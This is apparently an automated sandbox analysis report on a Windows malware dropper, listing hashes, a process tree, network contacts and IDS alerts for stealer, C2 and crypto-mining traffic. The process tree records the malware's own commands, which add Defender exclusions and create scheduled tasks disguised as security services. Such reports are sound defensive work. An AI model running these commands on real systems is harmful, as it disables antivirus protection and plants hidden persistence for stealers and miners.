Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 13, 2022, 8:13 p.m.	Aug. 13, 2022, 8:37 p.m.

Size	1.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`1b4fc049d71cc0d02f977f371d551a38`
SHA256	`de35d079d23fe6050502c88b2b40633f4518132df910c7100e000c4b7bcee167`
CRC32	`BAB0DB40`
ssdeep	`49152:pAI+nNpJc7YkpwL/n/HnBx5DN6cGLHAVQ86rDd:pAI+Zc8kgHnN21`
Yara	IsPE32 - (no description) UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

WW.exe "C:\Users\test22\AppData\Local\Temp\WW.exe"
2368
- iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
  2480
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409
    2552
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145410
    2764
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:210945
    2800
- F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
  2988
- kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
  2124
- namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
  2240
- real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"
  2408
- safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
  2500
- tag.exe "C:\Program Files (x86)\Company\NewProduct\tag.exe"
  2652
- jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
  2924
  - MinecraftForge.exe "C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe"
    3860
    - cmd.exe "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
      3988
      - chcp.com chcp 1251
        4044
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
        4088
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
        2468
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
        3272
    - dllhost.exe "C:\ProgramData\Dllhost\dllhost.exe"
      1172
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3600
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3684
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2632
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3404
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3620
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        292
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3316
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        1504
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3332
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3832
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        244
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3088
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3856
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3108
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3792
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3340
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        1512
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3568
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2312
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2828
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3992
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3756
      - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        3544
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        1060
      - cmd.exe "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        2064
        
        chcp.com chcp 1251
        2656
        
        winlogson.exe C:\ProgramData\Dllhost\winlogson.exe -c config.json
        2120
- ffnameedit.exe "C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"
  2568
- rawxdev.exe "C:\Program Files (x86)\Company\NewProduct\rawxdev.exe"
  2596
- WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe"
  3096
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
raw.githubusercontent.com	A 185.199.109.133 A 185.199.111.133 A 185.199.110.133 A 185.199.108.133	185.199.108.133
iplogger.org	A 148.251.234.83	148.251.234.83
apps.identrust.com	A 23.206.175.195 CNAME a1952.dscq.akamai.net A 23.206.175.225 CNAME identrust.edgesuite.net	119.207.65.137
insttaller.com	A 185.191.229.101	185.191.229.101
dl.uploadgram.me	A 176.9.247.226	176.9.247.226
github.com	A 20.200.245.247	52.78.231.108
xmr-eu2.nanopool.org	A 213.32.74.157 A 51.15.55.100 A 51.15.67.17 A 151.80.144.188 A 51.255.34.79 A 51.15.55.162 A 51.255.34.80	51.15.55.100

IP Address	Status	Action
103.89.90.61	Active	Moloch
117.18.232.200	Active	Moloch
148.251.234.83	Active	Moloch
164.124.101.2	Active	Moloch
176.113.115.146	Active	Moloch
176.9.247.226	Active	Moloch
185.191.229.101	Active	Moloch
185.199.110.133	Active	Moloch
193.56.146.177	Active	Moloch
195.54.170.157	Active	Moloch
20.200.245.247	Active	Moloch
23.206.175.225	Active	Moloch
45.159.248.173	Active	Moloch
51.15.55.100	Active	Moloch
62.204.41.144	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:63183 -> 164.124.101.2:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49174 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49174 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49177 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49177 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49177 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49180 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:51958 -> 164.124.101.2:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49183 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49183 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49183 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49171 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49171 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49181 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49171 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49181 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49178 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49178 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49178 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 148.251.234.83:443 -> 192.168.56.103:49189	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49188 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49188 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
UDP 192.168.56.103:60880 -> 164.124.101.2:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49180 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
UDP 192.168.56.103:63183 -> 8.8.8.8:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49180 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49207 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49207 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49207 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49207 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49191 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49173 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49191 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49173 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49191 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49173 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 148.251.234.83:443 -> 192.168.56.103:49186	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49192 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49192 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49192 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49192 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49195 -> 45.159.248.173:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49200 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 148.251.234.83:443 -> 192.168.56.103:49201	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49182 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49182 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49182 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49185 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49185 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49187 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49187 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49200 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49193 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49193 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49193 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49185 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49187 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49193 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49234 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49231 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49236 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.103:49239	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49233 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.103:49242	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 117.18.232.200:443 -> 192.168.56.103:49240	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49235 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49237 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49238 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49258 -> 20.200.245.247:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49259 -> 185.199.110.133:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 20.200.245.247:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49248 -> 176.9.247.226:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49289 -> 185.199.110.133:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:50092 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49214 -> 193.56.146.177:80	2036934	ET MALWARE Win32/RecordBreaker CnC Checkin	A Network Trojan was detected
TCP 192.168.56.103:49214 -> 193.56.146.177:80	2037274	ET MALWARE Win32/Kryptik.HQAF Checkin	A Network Trojan was detected
TCP 117.18.232.200:443 -> 192.168.56.103:49241	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 45.159.248.173:80	2036316	ET MALWARE Arkei/Vidar/Mars Stealer Variant	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49191 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49200 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49207 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49181 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 193.56.146.177:80 -> 192.168.56.103:49214	2036955	ET MALWARE Win32/RecordBreaker CnC Checkin - Server Response	A Network Trojan was detected
TCP 192.168.56.103:49177 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49192 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49173 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49178 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49183 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49180 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49171 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49185 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49182 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49193 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49187 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49258 20.200.245.247:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com	1e:16:cc:3f:84:2f:65:fc:c0:ab:93:2d:63:8a:c6:4a:95:c9:1b:7a
TLS 1.2 192.168.56.103:49259 185.199.110.133:443	C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io	8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2
TLS 1.2 192.168.56.103:49287 20.200.245.247:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com	1e:16:cc:3f:84:2f:65:fc:c0:ab:93:2d:63:8a:c6:4a:95:c9:1b:7a
TLS 1.2 192.168.56.103:49248 176.9.247.226:443	C=US, O=Let's Encrypt, CN=R3	CN=uploadgram.me	0b:46:9f:79:7b:ee:c3:6f:15:5b:37:09:45:b9:6b:65:a1:d8:ee:a8
TLS 1.2 192.168.56.103:49289 185.199.110.133:443	C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io	8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2
TLS 1.2 192.168.56.103:49295 51.15.55.100:14433	C=US, O=CloudFlare, Inc., OU=CloudFlare Origin SSL Certificate Authority, L=San Francisco, ST=California	O=CloudFlare, Inc., OU=CloudFlare Origin CA, CN=CloudFlare Origin Certificate	a4:ae:d4:ca:11:61:1f:57:07:59:2e:03:62:44:cf:80:e3:76:5d:42

Queries for the computername (50 out of 81 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
